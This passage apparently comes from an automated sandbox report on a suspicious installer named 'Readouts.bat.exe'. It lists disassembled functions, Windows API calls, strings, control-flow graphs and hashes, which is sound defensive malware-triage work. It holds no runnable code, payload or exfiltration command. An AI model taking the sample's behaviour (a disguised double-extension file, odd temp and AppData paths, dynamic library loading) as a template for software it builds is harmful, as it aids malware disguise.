                                                • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                • wsprintfW.USER32 ref: 00406640
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 708 4032b4-4032b5 706->708 709 403177-403197 GetTickCount call 4067bf 707->709 710 40329b-40329d 707->710 712 4032f4-4032f8 708->712 720 4032f1 709->720 722 40319d-4031a5 709->722 713 4032e6-4032ea 710->713 714 40329f-4032a2 710->714 715 4032b7-4032bd 713->715 716 4032ec 713->716 717 4032a4 714->717 718 4032a7-4032b0 call 4032fb 714->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->712 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 739 4032e0-4032e3 733->739 740 403297-403299 733->740 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 739->713 740->708 744 403252-403254 742->744 745 403209-403211 742->745 743->708 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 750 40325c-403261 call 405e2c 746->750 751 40326f-403275 746->751 747->722 752 403291 747->752 748->744 748->749 754 40324f 749->754 757 403266-403268 750->757 756 40327b-40327f 751->756 752->720 754->744 756->736 758 403285 756->758 757->740 759 40326a-40326d 757->759 758->720 759->756
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 551687249-2449383134
                                                • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                • GetLastError.KERNEL32 ref: 00405812
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                • GetLastError.KERNEL32 ref: 00405831
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 3449924974-3976562730
                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9
                                                Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 770 405df3-405df6 768->770 769->767 771 405df0 769->771 771->770
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405DC7
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Readouts.bat.exe",00403357,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3), ref: 00405DE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-2119542012
                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                Function 73CB177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 772 73cb177b-73cb17ba call 73cb1b63 776 73cb18da-73cb18dc 772->776 777 73cb17c0-73cb17c4 772->777 778 73cb17cd-73cb17da call 73cb2398 777->778 779 73cb17c6-73cb17cc call 73cb2356 777->779 784 73cb180a-73cb1811 778->784 785 73cb17dc-73cb17e1 778->785 779->778 786 73cb1813-73cb182f call 73cb256d call 73cb15b4 call 73cb1272 GlobalFree 784->786 787 73cb1831-73cb1835 784->787 788 73cb17fc-73cb17ff 785->788 789 73cb17e3-73cb17e4 785->789 813 73cb1889-73cb188d 786->813 790 73cb1882-73cb1888 call 73cb256d 787->790 791 73cb1837-73cb1880 call 73cb15c6 call 73cb256d 787->791 788->784 792 73cb1801-73cb1802 call 73cb2d2f 788->792 794 73cb17ec-73cb17ed call 73cb2a74 789->794 795 73cb17e6-73cb17e7 789->795 790->813 791->813 806 73cb1807 792->806 803 73cb17f2 794->803 801 73cb17e9-73cb17ea 795->801 802 73cb17f4-73cb17fa call 73cb2728 795->802 801->784 801->794 812 73cb1809 802->812 803->806 806->812 812->784 816 73cb18ca-73cb18d1 813->816 817 73cb188f-73cb189d call 73cb2530 813->817 816->776 819 73cb18d3-73cb18d4 GlobalFree 816->819 822 73cb189f-73cb18a2 817->822 823 73cb18b5-73cb18bc 817->823 819->776 822->823 824 73cb18a4-73cb18ac 822->824 823->816 825 73cb18be-73cb18c9 call 73cb153d 823->825 824->823 826 73cb18ae-73cb18af FreeLibrary 824->826 825->816 826->823
                                                APIs
                                                  • Part of subcall function 73CB1B63: GlobalFree.KERNEL32(?), ref: 73CB1DB6
                                                  • Part of subcall function 73CB1B63: GlobalFree.KERNEL32(?), ref: 73CB1DBB
                                                  • Part of subcall function 73CB1B63: GlobalFree.KERNEL32(?), ref: 73CB1DC0
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB1829
                                                • FreeLibrary.KERNEL32(?), ref: 73CB18AF
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB18D4
                                                  • Part of subcall function 73CB2356: GlobalAlloc.KERNEL32(00000040,?), ref: 73CB2387
                                                  • Part of subcall function 73CB2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73CB17FA,00000000), ref: 73CB27F8
                                                  • Part of subcall function 73CB15C6: lstrcpyW.KERNEL32(?,73CB4020,00000000,73CB15C3,?,00000000,73CB1753,00000000), ref: 73CB15DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: ef98c8754604c50348479c22eeac8916738002d89f1eb6593ef2c6a2db1c1db7
                                                • Instruction ID: f4c9989e71b9ce223bfc543a2bd5e542ede7f42d804a02139787e202dbbf3cc4
                                                • Opcode Fuzzy Hash: ef98c8754604c50348479c22eeac8916738002d89f1eb6593ef2c6a2db1c1db7
                                                • Instruction Fuzzy Hash: 2541A2734003889BDB01AF74D884B9637BEBF05311F1A4565E94BDE1C6EB7E8588CB60
                                                Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll), ref: 00405359
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID: `PT
                                                • API String ID: 334405425-1630263947
                                                • Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                                • Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                                Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,00000023,00000011,00000002), ref: 0040242F
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,00000000,00000011,00000002), ref: 0040246F
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,00000000,00000011,00000002), ref: 00402557
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp
                                                • API String ID: 2655323295-621082953
                                                • Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                • Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalFree.KERNEL32(00545060), ref: 00401BE7
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: Call$`PT
                                                • API String ID: 3394109436-2101293995
                                                • Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                • Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C12
                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon
                                                • API String ID: 1892508949-3194159820
                                                • Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                • Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
